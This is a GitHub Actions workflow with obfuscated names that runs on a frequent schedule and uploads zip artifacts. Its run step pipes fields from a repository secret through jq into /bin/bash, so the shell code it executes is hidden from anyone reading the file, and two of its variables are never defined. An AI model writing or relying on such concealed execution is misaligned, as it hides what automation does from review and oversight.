name: junmintiaowo
on:
  workflow_dispatch:

  schedule:
    - cron: '28 4,10,16,22 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: junmintiaowo
        env:
          rgyu4: ${{ secrets.rgyu4 }}
        run: |
          printf '%s' "$rgyu4" | jq -r .yud546 | /bin/bash
          printf '%s' "$h86" | jq -r .qh97322 | /bin/bash
          printf '%s' "$zkx38" | jq -r .cb730 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: WRniCmIk
          path: "*.zip"
          retention-days: 1
